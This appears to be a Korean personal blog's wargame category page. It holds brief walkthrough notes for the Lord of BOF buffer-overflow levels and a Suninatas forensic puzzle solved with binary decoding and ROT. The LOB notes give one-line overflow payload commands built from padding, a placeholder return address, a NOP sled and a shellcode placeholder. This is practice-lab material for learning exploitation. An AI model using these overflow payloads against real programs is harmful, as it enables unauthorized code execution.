$bash

'0x0400 : Wargame'에 해당되는 글 61건

  1. LOB_darkelf > orge
  2. LOB_wolfman > darkelf
  3. LOB_orc > wolfman
  4. LOB_goblin > orc
  5. LOB_coblot > goblin
  6. LOB_gremlin > cobolt
  7. LOB_gate > gremlin
  8. Lord of bof.
  9. Suninatas.kr - 19 Forensic
  10. Pwnable.kr - cmd2

LOB_darkelf > orge

0x0400 : Wargame/0x0402 : LOB


//  argv[1] 길이제한을 걸었는데...argv[0]에도 길이를 또 체크한다.


cp ~/orge `python -c 'print "A"*75'`

// 정보) './' 는 2바이트이다.


./python -c print "A"*75'` `python -c 'print "A"*44+"address_"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_wolfman > darkelf  (0) 2016.09.12
LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12

LOB_wolfman > darkelf

0x0400 : Wargame/0x0402 : LOB


// 점점 짤리기 시작.

// argv[1] 길이 제한


./darkelf `python -c 'print "A"*44+"address_"+"\x90"*100000+"shellcode"'`


// "주소" 에서 뒤쪽(오른쪽) 공간을 주면 argv[2]로 가는거 같다...?

// 페이로드에 공간을 넣어주면 인자로 구분가능. > 여러 인자로 넣을수 있다.

'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_darkelf > orge  (0) 2016.09.12
LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12

LOB_orc > wolfman

0x0400 : Wargame/0x0402 : LOB


// 흠......

// 아몰랑 놉썰갓


./wolfman `python -c 'print "A"*44+"address"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_darkelf > orge  (0) 2016.09.12
LOB_wolfman > darkelf  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12

LOB_goblin > orc

0x0400 : Wargame/0x0402 : LOB


// 에그헌터 = 환경변수 ㅗ

// argv[1] 47th > \xbf


./orc `python -c 'print "A"*44+"address"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_wolfman > darkelf  (0) 2016.09.12
LOB_orc > wolfman  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12

LOB_coblot > goblin

0x0400 : Wargame/0x0402 : LOB


// 표준 스트림, 작은 버퍼

// stdin을 가지고 노는것을 모르겠다...그냥 쉘주소 가져와서 품.


환경변수 씀.


(python -c 'print "A"*20+"address"'`;cat) | ./goblin


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12
Lord of bof.  (0) 2016.09.07

LOB_gremlin > cobolt

0x0400 : Wargame/0x0402 : LOB


// 작은 버퍼할당 > 리턴 뒤 할당.


./coblot `python -c 'print "A"*20+"address"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12
Lord of bof.  (0) 2016.09.07

LOB_gate > gremlin

0x0400 : Wargame/0x0402 : LOB


// 심플 bof.


./gremlin `python -c 'print "A"*(버퍼+sfp)+"shellcode"+"return"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
Lord of bof.  (0) 2016.09.07

Lord of bof.

0x0400 : Wargame/0x0402 : LOB


fin....


// Q. LOB던전 (1/3)

// Q. LOB분석 (0/1)


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12

Suninatas.kr - 19 Forensic

0x0400 : Wargame/0x0406 : Suninatas.com


이번에는 19번 포렌식 문제를 풀어보자. 꽤 오래전에 푼 기억이 난 문제지만 풀이를 쓰는걸 매번 까먹고 있었다...쩝

아무튼 풀어보도록 하자.



딱봐도 2진수인데 나눠서 읽기 편하게 하자.



파이썬으로 뚝딱 한 코딩내용

// 깨져서 윈도우에서 다시함....맥북 쓰래기네 ㅎ



2진수를 나눠 이제 분석할 차례인데. 바이너리 파일 같아서 일단 바이너리 디코더로 돌려보자.



나도 까먹고 그럴꺼 같아서 돌렸는데 한번에 맞췄다...

무튼 문자열을 알았으니 이제 저 코드를 가지고 flag를 추측해보자


문장 띄어쓰기며 문자 배열도 이상한게 예전 암호학 관련해서 본 책에서 카이사르 암호화가 떠오른다.

ROT로 디코더를 해보자.


성 공.

'0x0400 : Wargame > 0x0406 : Suninatas.com' 카테고리의 다른 글

Suninatas.kr - 18 Forensic  (0) 2016.06.12

Pwnable.kr - cmd2

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.